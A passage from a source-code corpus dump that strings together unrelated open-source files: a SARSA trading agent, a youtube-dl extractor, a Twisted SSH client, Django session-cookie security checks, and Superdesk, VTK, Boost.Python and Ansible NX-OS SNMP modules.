    logging.debug('Action: found {0} for {1}...'.format(actions_available, trade_status))
    return actions_available
def takeAction(s, a, trail):
    """Apply action *a*, returning the new trade-status vector and trail."""
    logging.info('Change: state {0} with action {1}...'.format(s, a))
    # action -> (resulting one-hot trade status, trail marker)
    transitions = {
        'waiting': ([1, 0, 0, 0], '_'),
        'enter-long': ([0, 1, 0, 0], 'B'),
        'stay-long': ([0, 1, 0, 0], 'B'),
        'enter-short': ([0, 0, 1, 0], 'S'),
        'stay-short': ([0, 0, 1, 0], 'S'),
        'exit-long': ([0, 0, 0, 1], '!'),
        'exit-short': ([0, 0, 0, 1], '!'),
        'completed': ([0, 0, 0, 1], '!'),
    }
    if a not in transitions:
        raise Exception('Unknown action [{0}] to take on state [{1}]'.format(a, s[:4]))
    s_trade_status, marker = transitions[a]
    trail += marker
    logging.info('Change: trail = {0}'.format(trail))
    logging.info('Change: state is now {0}...'.format(s_trade_status))
    return s_trade_status, trail
def getReward(trail, optimus):
    """Return the fraction of positions where *trail* matches *optimus*."""
    logging.info('Reward: trail vs optimus')
    optimus_len = float(len(optimus))
    # position-wise precision against the optimal trail
    r_correct = sum(1 for got, want in zip(trail, optimus) if got == want)
    r_precision = r_correct / optimus_len
    logging.debug('Reward: correct {0:.0f} => {1:.2f}'.format(r_correct, r_precision))
    logging.info('Reward: {0:.2f}'.format(r_precision))
    return r_precision
########################################################################################################
# SARSA
########################################################################################################
def getAction(q, s, epsilon):
    """Choose an action for state *s* with epsilon-greedy selection.

    With probability *epsilon* a random legal action is explored;
    otherwise the action with the highest Q-value is exploited, where
    unseen (state, action) pairs get a random optimistic value.
    """
    logging.info('Action: finding...')
    actions_available = getActionsAvailable(s[:4])
    # exploration
    if random() < epsilon:
        logging.debug('Action: explore (<{0:.2f})'.format(epsilon))
        a = choice(actions_available)
    # exploitation
    else:
        logging.debug('Action: exploit (>{0:.2f})'.format(epsilon))
        # start below any representable Q-value; the previous q_max=None
        # only compared correctly under Python 2's arbitrary mixed-type
        # ordering and raises TypeError on Python 3
        q_max = float('-inf')
        for action in actions_available:
            q_sa = q.get((tuple(s), action), random() * 10.)
            logging.debug('Qsa action {0} is {1:.4f}'.format(action, q_sa))
            if q_sa > q_max:
                q_max = q_sa
                a = action
    logging.info('Action: found {0}'.format(a))
    return a
def getDelta(q, s, a, r, s_next, a_next, gamma):
    """Compute the SARSA temporal-difference error for one transition."""
    logging.info('Delta: calculating...')
    q_sa = q.get((tuple(s), a), 0)
    # terminal transitions (no successor state/action) bootstrap from r
    if s_next and a_next:
        q_sa_next = q.get((tuple(s_next), a_next), r)
    else:
        q_sa_next = r
    d = r + (gamma * q_sa_next) - q_sa
    logging.debug('Delta: r [{0:.2f}] + (gamma [{1:.2f}] * Qs`a` [{2:.4f}]) - Qsa [{3:.4f}]'.format(r, gamma, q_sa_next, q_sa))
    logging.info('Delta: {0:.4f}'.format(d))
    return d
def updateQ(q, s, a, d, r, etraces, lamda, gamma, alpha):
    """Apply one SARSA(lambda) update to the Q table.

    The current (state, action) pair has its eligibility trace bumped,
    every traced pair is nudged towards the TD error *d* (scaled by
    *alpha* and its trace) when a reward is present, and traces decay
    by gamma * lamda, dropping those that became negligible.
    """
    logging.info('Q: updating learning at {0:.2f} with lambda {1:.2f}...'.format(alpha, lamda))
    # update current s,a
    sa = (tuple(s), a)
    etraces[sa] = etraces.get(sa, 0.) + 1
    # update for all etraces; .items() works on both Python 2 and 3,
    # unlike the Python-2-only dict.iteritems() (etraces is not mutated
    # during iteration, only etraces_updated is built)
    etraces_updated = {}
    for sa, e_sa in etraces.items():
        # q (only if there is a reward)
        if r:
            q_sa = q.get(sa, r)
            q_sa_updated = q_sa + (alpha * d * e_sa)
            q[sa] = q_sa_updated
            logging.debug('Q: before {0:.4f} \t et {1:.2f} \t after {2:.4f}'.format(q_sa, e_sa, q_sa_updated))
        # decay etrace, discarding near-zero traces
        if e_sa > 0.01:
            etraces_updated[sa] = e_sa * gamma * lamda
    return q, etraces_updated
########################################################################################################
# CLI entry point: -d/--debug switches logging from WARN to DEBUG
if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-d', '--debug', action='store_true')
    args = parser.parse_args()
    debug = args.debug
    lvl = logging.DEBUG if debug else logging.WARN
    logging.basicConfig(
        level=lvl,
        format='%(asctime)s %(name)-8s %(levelname)-8s %(message)s',
        # datefmt='%Y-%m-%d %H:%M:',
    )
main(debug) | mit |
vijayanandnandam/youtube-dl | youtube_dl/extractor/crooksandliars.py | 64 | 2061 | from __future__ import unicode_literals
from .common import InfoExtractor
from ..utils import (
int_or_none,
qualities,
)
class CrooksAndLiarsIE(InfoExtractor):
    """Extractor for videos embedded via embed.crooksandliars.com."""
    _VALID_URL = r'https?://embed\.crooksandliars\.com/(?:embed|v)/(?P<id>[A-Za-z0-9]+)'
    _TESTS = [{
        'url': 'https://embed.crooksandliars.com/embed/8RUoRhRi',
        'info_dict': {
            'id': '8RUoRhRi',
            'ext': 'mp4',
            'title': 'Fox & Friends Says Protecting Atheists From Discrimination Is Anti-Christian!',
            'description': 'md5:e1a46ad1650e3a5ec7196d432799127f',
            'thumbnail': r're:^https?://.*\.jpg',
            'timestamp': 1428207000,
            'upload_date': '20150405',
            'uploader': 'Heather',
            'duration': 236,
        }
    }, {
        'url': 'http://embed.crooksandliars.com/v/MTE3MjUtMzQ2MzA',
        'only_matching': True,
    }]
    def _real_extract(self, url):
        # the embed page carries a JS "manifest" object with all metadata
        video_id = self._match_id(url)
        webpage = self._download_webpage(
            'http://embed.crooksandliars.com/embed/%s' % video_id, video_id)
        manifest = self._parse_json(
            self._search_regex(
                r'var\s+manifest\s*=\s*({.+?})\n', webpage, 'manifest JSON'),
            video_id)
        # preference order: low to high quality
        quality = qualities(('webm_low', 'mp4_low', 'webm_high', 'mp4_high'))
        # keep only video flavors (the manifest may also list audio/images)
        formats = [{
            'url': item['url'],
            'format_id': item['type'],
            'quality': quality(item['type']),
        } for item in manifest['flavors'] if item['mime'].startswith('video/')]
        self._sort_formats(formats)
        return {
            'url': url,
            'id': video_id,
            'title': manifest['title'],
            'description': manifest.get('description'),
            'thumbnail': self._proto_relative_url(manifest.get('poster')),
            'timestamp': int_or_none(manifest.get('created')),
            'uploader': manifest.get('author'),
            'duration': int_or_none(manifest.get('duration')),
            'formats': formats,
        }
| unlicense |
sinkuri256/python-for-android | python-modules/twisted/twisted/conch/client/direct.py | 60 | 3234 | # Copyright (c) 2001-2008 Twisted Matrix Laboratories.
# See LICENSE for details.
from twisted.internet import defer, protocol, reactor
from twisted.conch import error
from twisted.conch.ssh import transport
from twisted.python import log
class SSHClientFactory(protocol.ClientFactory):
    """Factory producing SSHClientTransport connections.

    *d* is a Deferred fired once user authentication starts (or errbacked
    on connection failure/disconnect); it is set to None after firing.
    """
    def __init__(self, d, options, verifyHostKey, userAuthObject):
        self.d = d
        self.options = options
        self.verifyHostKey = verifyHostKey
        self.userAuthObject = userAuthObject
    def clientConnectionLost(self, connector, reason):
        # optionally reconnect when the 'reconnect' option is set
        if self.options['reconnect']:
            connector.connect()
    def clientConnectionFailed(self, connector, reason):
        # fire the completion deferred exactly once
        if self.d is None:
            return
        d, self.d = self.d, None
        d.errback(reason)
    def buildProtocol(self, addr):
        # apply any user-requested algorithm restrictions to the transport
        trans = SSHClientTransport(self)
        if self.options['ciphers']:
            trans.supportedCiphers = self.options['ciphers']
        if self.options['macs']:
            trans.supportedMACs = self.options['macs']
        if self.options['compress']:
            trans.supportedCompressions[0:1] = ['zlib']
        if self.options['host-key-algorithms']:
            trans.supportedPublicKeys = self.options['host-key-algorithms']
        return trans
class SSHClientTransport(transport.SSHClientTransport):
    """SSH client transport that reports progress via the factory deferred."""
    def __init__(self, factory):
        self.factory = factory
        self.unixServer = None
    def connectionLost(self, reason):
        # stop any local unix-socket listener before propagating the loss
        if self.unixServer:
            d = self.unixServer.stopListening()
            self.unixServer = None
        else:
            d = defer.succeed(None)
        d.addCallback(lambda x:
            transport.SSHClientTransport.connectionLost(self, reason))
    def receiveError(self, code, desc):
        # remote sent an SSH disconnect error: errback once
        if self.factory.d is None:
            return
        d, self.factory.d = self.factory.d, None
        d.errback(error.ConchError(desc, code))
    def sendDisconnect(self, code, reason):
        # local disconnect: send it, then errback the pending deferred
        if self.factory.d is None:
            return
        d, self.factory.d = self.factory.d, None
        transport.SSHClientTransport.sendDisconnect(self, code, reason)
        d.errback(error.ConchError(reason, code))
    def receiveDebug(self, alwaysDisplay, message, lang):
        log.msg('Received Debug Message: %s' % message)
        if alwaysDisplay: # XXX what should happen here?
            print message
    def verifyHostKey(self, pubKey, fingerprint):
        # delegate host-key verification to the caller-supplied policy
        return self.factory.verifyHostKey(self, self.transport.getPeer().host, pubKey,
                                          fingerprint)
    def setService(self, service):
        log.msg('setting client server to %s' % service)
        transport.SSHClientTransport.setService(self, service)
        # fire the completion deferred once past user authentication
        if service.name != 'ssh-userauth' and self.factory.d is not None:
            d, self.factory.d = self.factory.d, None
            d.callback(None)
    def connectionSecure(self):
        self.requestService(self.factory.userAuthObject)
def connect(host, port, options, verifyHostKey, userAuthObject):
    """Open an SSH connection; returns a Deferred that fires after auth."""
    d = defer.Deferred()
    factory = SSHClientFactory(d, options, verifyHostKey, userAuthObject)
    reactor.connectTCP(host, port, factory)
    return d
| apache-2.0 |
danilito19/django | django/core/checks/security/sessions.py | 477 | 2595 | from django.conf import settings
from .. import Tags, Warning, register
def add_session_cookie_message(message):
    """Append the SESSION_COOKIE_SECURE rationale to *message*."""
    suffix = (
        " Using a secure-only session cookie makes it more difficult for "
        "network traffic sniffers to hijack user sessions."
    )
    return message + suffix
# Deploy-check warnings for SESSION_COOKIE_SECURE: one per way the session
# framework can be enabled (app or middleware); W012 replaces both when the
# sessions app and middleware are enabled together.
W010 = Warning(
    add_session_cookie_message(
        "You have 'django.contrib.sessions' in your INSTALLED_APPS, "
        "but you have not set SESSION_COOKIE_SECURE to True."
    ),
    id='security.W010',
)
W011 = Warning(
    add_session_cookie_message(
        "You have 'django.contrib.sessions.middleware.SessionMiddleware' "
        "in your MIDDLEWARE_CLASSES, but you have not set "
        "SESSION_COOKIE_SECURE to True."
    ),
    id='security.W011',
)
W012 = Warning(
    add_session_cookie_message("SESSION_COOKIE_SECURE is not set to True."),
    id='security.W012',
)
def add_httponly_message(message):
    """Append the SESSION_COOKIE_HTTPONLY rationale to *message*."""
    suffix = (
        " Using an HttpOnly session cookie makes it more difficult for "
        "cross-site scripting attacks to hijack user sessions."
    )
    return message + suffix
# Deploy-check warnings for SESSION_COOKIE_HTTPONLY, mirroring W010-W012.
W013 = Warning(
    add_httponly_message(
        "You have 'django.contrib.sessions' in your INSTALLED_APPS, "
        "but you have not set SESSION_COOKIE_HTTPONLY to True.",
    ),
    id='security.W013',
)
W014 = Warning(
    add_httponly_message(
        "You have 'django.contrib.sessions.middleware.SessionMiddleware' "
        "in your MIDDLEWARE_CLASSES, but you have not set "
        "SESSION_COOKIE_HTTPONLY to True."
    ),
    id='security.W014',
)
W015 = Warning(
    add_httponly_message("SESSION_COOKIE_HTTPONLY is not set to True."),
    id='security.W015',
)
@register(Tags.security, deploy=True)
def check_session_cookie_secure(app_configs, **kwargs):
    """Warn when SESSION_COOKIE_SECURE is off but sessions are in use."""
    errors = []
    if not settings.SESSION_COOKIE_SECURE:
        if _session_app():
            errors.append(W010)
        if _session_middleware():
            errors.append(W011)
        # both app and middleware enabled: collapse into the single W012
        if len(errors) > 1:
            errors = [W012]
    return errors
@register(Tags.security, deploy=True)
def check_session_cookie_httponly(app_configs, **kwargs):
    """Warn when SESSION_COOKIE_HTTPONLY is off but sessions are in use."""
    errors = []
    if not settings.SESSION_COOKIE_HTTPONLY:
        if _session_app():
            errors.append(W013)
        if _session_middleware():
            errors.append(W014)
        # both app and middleware enabled: collapse into the single W015
        if len(errors) > 1:
            errors = [W015]
    return errors
def _session_middleware():
    """True when the session middleware is enabled in settings."""
    return ("django.contrib.sessions.middleware.SessionMiddleware" in
            settings.MIDDLEWARE_CLASSES)
def _session_app():
    """True when the sessions app is listed in INSTALLED_APPS."""
    return "django.contrib.sessions" in settings.INSTALLED_APPS
| bsd-3-clause |
charbeljc/account-financial-tools | account_asset_management_xls/wizard/__init__.py | 34 | 1107 | # -*- encoding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
#
# Copyright (c) 2014 Noviat nv/sa (www.noviat.com). All rights reserved.
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
from . import account_asset_report_wizard
# vim:expandtab:smartindent:tabstop=4:softtabstop=4:shiftwidth=4:
| agpl-3.0 |
tastyproject/tasty | tasty/tests/unittests/tastyot_test.py | 1 | 5312 | # -*- coding: utf-8 -*-
import unittest
from tasty.tastyot import TastyOT
from multiprocessing import Process
from tasty.osock import *
from time import sleep
from tasty.types import Party
from tasty import utils, config, state
from tasty.protocols.otprotocols import paillierot
from tasty.protocols.otprotocols import PaillierOT, ECNaorPinkasOT
import socket, atexit
from gmpy import mpz
from itertools import product
import time
#TODO: @Immo: please document how OT tests work
class TastyOTTestCase(unittest.TestCase):
    """Round-trip tests for TastyOT via the client/server OTTest harness."""
    def setUp(self):
        # minimal two-party configuration; OTs run over localhost sockets
        state.config = config.create_configuration(security_level="short", asymmetric_security_parameter=1024, symmetric_security_parameter=80, ot_type = "EC", host="::1", port=8000, protocol_dir="docs/millionaires_problem/")
        state.config.ot_chain = [PaillierOT]
    def test_tastyot(self):
        """ testing the global TastyOT """
        # state.config.ot_chain = [paillierot.PaillierOT]
        n = 128 # must be even
        self.ot = t = OTTest(n)
        # random choice bits and random 80-bit message pairs for two rounds
        x = tuple(utils.get_random(0,1,n/2))
        y = tuple(utils.get_random(0,1,n/2))
        xc = [tuple(utils.get_random(0,2**80-1,2)) for i in xrange(n/2)]
        yc = [tuple(utils.get_random(0,2**80-1,2)) for i in xrange(n/2)]
        # expected: for each pair, the message selected by the choice bit
        resultx = tuple(map(lambda x: mpz(x[0][x[1]]), zip(xc, x)))
        resulty = tuple(map(lambda x: mpz(x[0][x[1]]), zip(yc, y)))
        res = t.next_ots(x, xc)[1]
        self.assertEqual(res, resultx)
        res2 = t.next_ots(y, yc)[1]
        self.assertEqual(res2, resulty)
        # self.failUnlessRaises(OverflowError, t.next_ots, t, ((1,),(5,7)))
    def test_ot_protocol_performance(self):
        """ testing available OT protocols """
        # for security_level, ot_type in product(("short","medium","long"), ("Paillier","EC_c","EC")):
        for security_level, ot_type in product(("short","medium","long"), ("EC_c","EC")):
            print security_level, ot_type,
            start_time = time.clock()
            # protocols = [ECNaorPinkasOT.NP_EC_OT_secp192r1, ECNaorPinkasOT.NP_EC_OT_secp192r1_c,
            #              ECNaorPinkasOT.NP_EC_OT_secp224r1, ECNaorPinkasOT.NP_EC_OT_secp224r1_c,
            #              ECNaorPinkasOT.NP_EC_OT_secp256r1, ECNaorPinkasOT.NP_EC_OT_secp256r1_c]
            # protocols = state.config.ot_chain
            n = state.config.symmetric_security_parameter
            # for prot in protocols:
            #     print prot.__name__
            #     state.config.ot_chain = [prot]
            self.ot = t = OTTest(n)
            x = tuple(utils.get_random(0,1,n/2))
            y = tuple(utils.get_random(0,1,n/2))
            xc = [tuple(utils.get_random(0,2**n-1,2)) for i in xrange(n/2)] # n-bit messages
            yc = [tuple(utils.get_random(0,2**n-1,2)) for i in xrange(n/2)] # n-bit messages
            resultx = tuple(map(lambda x: mpz(x[0][x[1]]), zip(xc, x)))
            resulty = tuple(map(lambda x: mpz(x[0][x[1]]), zip(yc, y)))
            res = t.next_ots(x, xc)[1]
            self.assertEqual(res, resultx)
            res2 = t.next_ots(y, yc)[1]
            self.assertEqual(res2, resulty)
            print "%fs" % (time.clock()-start_time)
class OTTest(object):
    """Two-party OT harness: this process plays the server; a forked
    child process plays the client. The pair communicates over two
    localhost object sockets (8000 for the OT party channel, 8001 for
    harness control messages)."""
    def __init__(self, num):
        self.num = num
        # fork the client half before binding the server sockets
        p = Process(target=OTTest.client,
                    args=(self, num))
        p.start()
        self.init_server()
        atexit.register(self.__del__)
    def next_ots(self, choices, transfer):
        """Run one batch of OTs; returns (server result, client result)."""
        # debug ("starting online phase")
        self.csock.sendobj("online")
        self.csock.sendobj(choices)
        sres = self.server_online(transfer)
        cres = self.csock.recvobj()
        return (sres, cres)
    def init_client(self):
        sleep(.1) #give the server time to set up
        sock = ClientObjectSocket(host="::1", port=8000)
        sleep(.1)
        self.csock = ClientObjectSocket(host="::1", port=8001)
        self.party = Party(role=Party.CLIENT, sock=sock)
    def client(self, num):
        """Child-process main loop: serve 'online' requests until 'quit'."""
        self.init_client()
        self.ot = TastyOT(self.party, num)
        while True:
            next = self.csock.recvobj()
            # debug ("executing command %s"%next)
            if next == "online":
                self.client_online(self.csock.recvobj())
            elif next == "quit":
                exit(0)
            else:
                raise NotImplementedError(next)
    def init_server(self):
        sock = ServerObjectSocket(host="::1", port=8000).accept()[0]
        self.csock = ServerObjectSocket(host="::1", port=8001).accept()[0]
        self.party = party = Party(role=Party.SERVER, sock=sock)
        self.ot = TastyOT(self.party, self.num)
    def client_online(self, arg):
        # run the client side of the OT and ship the result back
        self.csock.sendobj(self.ot.next_ots(arg))
    def server_online(self, arg):
        # server side returns None; only the client result is meaningful
        self.ot.next_ots(arg)
    def __del__(self):
        try:
            self.csock.sendobj("quit")
            self.csock.close()
        except socket.error: #server side has already exited
            pass
def suite():
    """Build the test suite (only the performance test is enabled)."""
    suite = unittest.TestSuite()
    # suite.addTest(TastyOTTestCase("test_tastyot"))
    suite.addTest(TastyOTTestCase("test_ot_protocol_performance"))
    return suite
# run the suite directly when invoked as a script
if __name__ == '__main__':
    unittest.TextTestRunner(verbosity=2).run(suite())
| gpl-3.0 |
verifiedpixel/superdesk | server/apps/highlights/resource.py | 3 | 1247 |
from superdesk.resource import Resource
# Elastic-style date-math tokens accepted by the auto_insert field:
# every hourly lookback from 1h to 24h, plus start-of-day and start-of-week.
TODAY_DATE = 'now/d'
WEEK_DATE = 'now/w'
allowed_times = []
for hours in range(1, 25):
    allowed_times.append('now-{0}h'.format(hours))
allowed_times.extend([TODAY_DATE, WEEK_DATE])
class HighlightsResource(Resource):
    '''
    Highlights schema
    '''
    schema = {
        # unique (case-insensitive) highlight list name
        'name': {
            'type': 'string',
            'iunique': True,
            'required': True
        },
        # desks whose items can be marked for this highlight
        'desks': {
            'type': 'list',
            'schema': Resource.rel('desks', True)
        },
        # lookback window for automatic insertion; defaults to today
        'auto_insert': {
            'type': 'string',
            'allowed': allowed_times,
            'default': TODAY_DATE,
        },
        'groups': {
            'type': 'list',
            'schema': {
                'type': 'string'
            }
        }
    }
    privileges = {'POST': 'highlights', 'PATCH': 'highlights', 'DELETE': 'highlights'}
class MarkedForHighlightsResource(Resource):
    '''
    Marked for highlights Schema
    '''
    schema = {
        # id of the highlight list the item is marked for
        'highlights': {
            'type': 'string',
            'required': True
        },
        # id of the marked content item
        'marked_item': {
            'type': 'string',
            'required': True
        }
    }
    privileges = {'POST': 'mark_for_highlights'}
| agpl-3.0 |
joshua-cogliati-inl/moose | gui/vtk/ExodusRenderer.py | 34 | 4695 | import os, sys, getopt
try:
from PyQt4 import QtCore, QtGui
QtCore.Signal = QtCore.pyqtSignal
QtCore.Slot = QtCore.pyqtSlot
except ImportError:
try:
from PySide import QtCore, QtGui
QtCore.QString = str
except ImportError:
raise ImportError("Cannot load either PyQt or PySide")
import vtk
from vtk.util.colors import peacock, tomato, red, white, black
from ExodusActor import ExodusActor
from ClippedActor import ClippedActor
from MeshRenderer import MeshRenderer
try:
_fromUtf8 = QtCore.QString.fromUtf8
except AttributeError:
_fromUtf8 = lambda s: s
class ExodusMap:
    # These are the blocks from the multiblockdataset that correspond to each item
    element_vtk_block = 0   # element blocks live in multiblock index 0
    sideset_vtk_block = 4   # sidesets live in multiblock index 4
    nodeset_vtk_block = 7   # nodesets live in multiblock index 7
class ExodusRenderer(MeshRenderer):
    """MeshRenderer that reads an Exodus II file and builds actors for
    every element block, sideset and nodeset (plus clipped variants)."""
    def __init__(self, render_widget, mesh_item_data):
        MeshRenderer.__init__(self, render_widget, mesh_item_data)
        self.file_name = mesh_item_data['file']
        self.buildActors(self.file_name)
    def buildActors(self, file_name):
        """Read the Exodus file and populate the actor dictionaries.

        NOTE(review): the reader uses self.file_name rather than the
        file_name argument -- identical at the only call site.
        """
        reader = vtk.vtkExodusIIReader()
        reader.SetFileName(self.file_name)
        reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL, 1)
        reader.SetAllArrayStatus(vtk.vtkExodusIIReader.EDGE_SET, 1)
        reader.SetAllArrayStatus(vtk.vtkExodusIIReader.SIDE_SET, 1)
        reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODE_SET, 1)
        reader.SetAllArrayStatus(vtk.vtkExodusIIReader.NODAL_TEMPORAL, 1)
        reader.UpdateInformation()
        reader.SetObjectStatus(vtk.vtkExodusIIReader.NODE_SET, 0, 1)
        num_sidesets = reader.GetNumberOfSideSetArrays()
        num_nodesets = reader.GetNumberOfNodeSetArrays()
        num_blocks = reader.GetNumberOfElementBlockArrays()
        # map sideset ids <-> reader array indices and (optional) names;
        # names containing 'Unnamed' are auto-generated and skipped
        self.sidesets = []
        self.sideset_id_to_exodus_block = {}
        self.sideset_id_to_name = {}
        self.name_to_sideset_id = {}
        for i in xrange(num_sidesets):
            sideset_id = reader.GetObjectId(vtk.vtkExodusIIReader.SIDE_SET,i)
            self.sidesets.append(sideset_id)
            self.sideset_id_to_exodus_block[sideset_id] = i
            reader.SetObjectStatus(vtk.vtkExodusIIReader.SIDE_SET, i, 1)
            name = reader.GetObjectName(vtk.vtkExodusIIReader.SIDE_SET,i).split(' ')
            if 'Unnamed' not in name:
                self.sideset_id_to_name[sideset_id] = name[0]
                self.name_to_sideset_id[name[0]] = sideset_id
        # same bookkeeping for nodesets
        self.nodesets = []
        self.nodeset_id_to_exodus_block = {}
        self.nodeset_id_to_name = {}
        self.name_to_nodeset_id = {}
        for i in xrange(num_nodesets):
            nodeset_id = reader.GetObjectId(vtk.vtkExodusIIReader.NODE_SET,i)
            self.nodesets.append(nodeset_id)
            self.nodeset_id_to_exodus_block[nodeset_id] = i
            reader.SetObjectStatus(vtk.vtkExodusIIReader.NODE_SET, i, 1)
            name = reader.GetObjectName(vtk.vtkExodusIIReader.NODE_SET,i).split(' ')
            if 'Unnamed' not in name:
                self.nodeset_id_to_name[nodeset_id] = name[0]
                self.name_to_nodeset_id[name[0]] = nodeset_id
        # same bookkeeping for element blocks
        self.blocks = []
        self.block_id_to_exodus_block = {}
        self.block_id_to_name = {}
        self.name_to_block_id = {}
        for i in xrange(num_blocks):
            block_id = reader.GetObjectId(vtk.vtkExodusIIReader.ELEM_BLOCK,i)
            self.blocks.append(block_id)
            self.block_id_to_exodus_block[block_id] = i
            name = reader.GetObjectName(vtk.vtkExodusIIReader.ELEM_BLOCK,i).split(' ')
            if 'Unnamed' not in name:
                self.block_id_to_name[block_id] = name[0]
                self.name_to_block_id[name[0]] = block_id
        reader.SetTimeStep(1)
        reader.Update()
        self.data = reader.GetOutput()
        # build one actor + one clipped actor per sideset/nodeset/block,
        # keyed by the string form of the Exodus id
        for i in xrange(num_sidesets):
            actor = ExodusActor(self.renderer, self.data, ExodusMap.sideset_vtk_block, i)
            self.sideset_actors[str(self.sidesets[i])] = actor
            self.all_actors.append(actor)
            clipped_actor = ClippedActor(actor, self.plane)
            self.clipped_sideset_actors[str(self.sidesets[i])] = clipped_actor
            self.all_actors.append(clipped_actor)
        for i in xrange(num_nodesets):
            actor = ExodusActor(self.renderer, self.data, ExodusMap.nodeset_vtk_block, i)
            self.nodeset_actors[str(self.nodesets[i])] = actor
            self.all_actors.append(actor)
            clipped_actor = ClippedActor(actor, self.plane)
            self.clipped_nodeset_actors[str(self.nodesets[i])] = clipped_actor
            self.all_actors.append(clipped_actor)
        for i in xrange(num_blocks):
            actor = ExodusActor(self.renderer, self.data, ExodusMap.element_vtk_block, i)
            self.block_actors[str(self.blocks[i])] = actor
            self.all_actors.append(actor)
            clipped_actor = ClippedActor(actor, self.plane)
            self.clipped_block_actors[str(self.blocks[i])] = clipped_actor
            self.all_actors.append(clipped_actor)
| lgpl-2.1 |
gwq5210/litlib | thirdparty/sources/boost_1_60_0/libs/python/test/virtual_functions.py | 46 | 1803 | # Copyright David Abrahams 2004. Distributed under the Boost
# Software License, Version 1.0. (See accompanying
# file LICENSE_1_0.txt or copy at http://www.boost.org/LICENSE_1_0.txt)
'''
>>> from virtual_functions_ext import *
>>> class C1(concrete):
... def f(self, y):
... return concrete.f(self, Y(-y.value()))
>>> class C2(concrete):
... pass
>>> class A1(abstract):
... def f(self, y):
... return y.value() * 2
... def g(self, y):
... return self
>>> class A2(abstract):
... pass
>>> y1 = Y(16)
>>> y2 = Y(17)
#
# Test abstract with f,g overridden
#
>>> a1 = A1(42)
>>> a1.value()
42
# Call f,g indirectly from C++
>>> a1.call_f(y1)
32
>>> assert type(a1.call_g(y1)) is abstract
# Call f directly from Python
>>> a1.f(y2)
34
#
# Test abstract with f not overridden
#
>>> a2 = A2(42)
>>> a2.value()
42
# Call f indirectly from C++
>>> try: a2.call_f(y1)
... except AttributeError: pass
... else: print 'no exception'
# Call f directly from Python
>>> try: a2.call_f(y2)
... except AttributeError: pass
... else: print 'no exception'
############# Concrete Tests ############
#
# Test concrete with f overridden
#
>>> c1 = C1(42)
>>> c1.value()
42
# Call f indirectly from C++
>>> c1.call_f(y1)
-16
# Call f directly from Python
>>> c1.f(y2)
-17
#
# Test concrete with f not overridden
#
>>> c2 = C2(42)
>>> c2.value()
42
# Call f indirectly from C++
>>> c2.call_f(y1)
16
# Call f directly from Python
>>> c2.f(y2)
17
'''
def run(args=None):
    """Run this module's doctests, optionally overriding sys.argv."""
    import sys
    import doctest
    if args is not None:
        sys.argv = args
    module = sys.modules.get(__name__)
    return doctest.testmod(module)
# script entry point: exit status is the number of failed doctests
if __name__ == '__main__':
    print "running..."
    import sys
    status = run()[0]
    if (status == 0): print "Done."
    sys.exit(status)
| gpl-3.0 |
drmrd/ansible | lib/ansible/modules/network/nxos/nxos_snmp_community.py | 77 | 6703 | #!/usr/bin/python
#
# This file is part of Ansible
#
# Ansible is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# Ansible is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Ansible. If not, see <http://www.gnu.org/licenses/>.
#
ANSIBLE_METADATA = {'metadata_version': '1.1',
'status': ['preview'],
'supported_by': 'network'}
DOCUMENTATION = '''
---
module: nxos_snmp_community
extends_documentation_fragment: nxos
version_added: "2.2"
short_description: Manages SNMP community configs.
description:
- Manages SNMP community configuration.
author:
- Jason Edelman (@jedelman8)
- Gabriele Gerbino (@GGabriele)
notes:
- Tested against NXOSv 7.3.(0)D1(1) on VIRL
options:
community:
description:
- Case-sensitive community string.
required: true
access:
description:
- Access type for community.
choices: ['ro','rw']
group:
description:
- Group to which the community belongs.
acl:
description:
- ACL name to filter snmp requests or keyword 'default'.
state:
description:
- Manage the state of the resource.
default: present
choices: ['present','absent']
'''
EXAMPLES = '''
# ensure snmp community is configured
- nxos_snmp_community:
community: TESTING7
group: network-operator
state: present
'''
RETURN = '''
commands:
description: commands sent to the device
returned: always
type: list
sample: ["snmp-server community TESTING7 group network-operator"]
'''
import re
from ansible.module_utils.network.nxos.nxos import load_config, run_commands
from ansible.module_utils.network.nxos.nxos import nxos_argument_spec, check_args
from ansible.module_utils.basic import AnsibleModule
def execute_show_command(command, module):
    """Run a single show command on the device.

    'show run' output is requested as raw text; everything else as JSON.
    """
    output = 'text' if 'show run' in command else 'json'
    cmds = [{
        'command': command,
        'output': output,
    }]
    return run_commands(module, cmds)
def flatten_list(command_lists):
    """Flatten one level of nesting: list items are spliced in order."""
    flattened = []
    for entry in command_lists:
        flattened.extend(entry if isinstance(entry, list) else [entry])
    return flattened
def get_snmp_groups(module):
    """Return the SNMP group (role) names configured on the device."""
    data = execute_show_command('show snmp group', module)[0]
    group_list = []
    try:
        # the table/rows may be missing entirely when nothing is configured
        for role_row in data['TABLE_role']['ROW_role']:
            group_list.append(role_row['role_name'])
    except (KeyError, AttributeError):
        pass
    return group_list
def get_snmp_community(module, name):
    """Parse the running config for community *name*.

    Returns {} when the community does not exist, otherwise a dict with
    'group' and 'acl' keys (each possibly None).
    """
    command = 'show run snmp all | grep {0}'.format(name)
    data = execute_show_command(command, module)[0]
    community_dict = {}
    if not data:
        return community_dict
    # the community string itself
    community_re = r'snmp-server community (\S+)'
    mo = re.search(community_re, data)
    if mo:
        community_name = mo.group(1)
    else:
        return community_dict
    # optional group binding
    community_dict['group'] = None
    group_re = r'snmp-server community {0} group (\S+)'.format(community_name)
    mo = re.search(group_re, data)
    if mo:
        community_dict['group'] = mo.group(1)
    # optional ACL filter
    community_dict['acl'] = None
    acl_re = r'snmp-server community {0} use-acl (\S+)'.format(community_name)
    mo = re.search(acl_re, data)
    if mo:
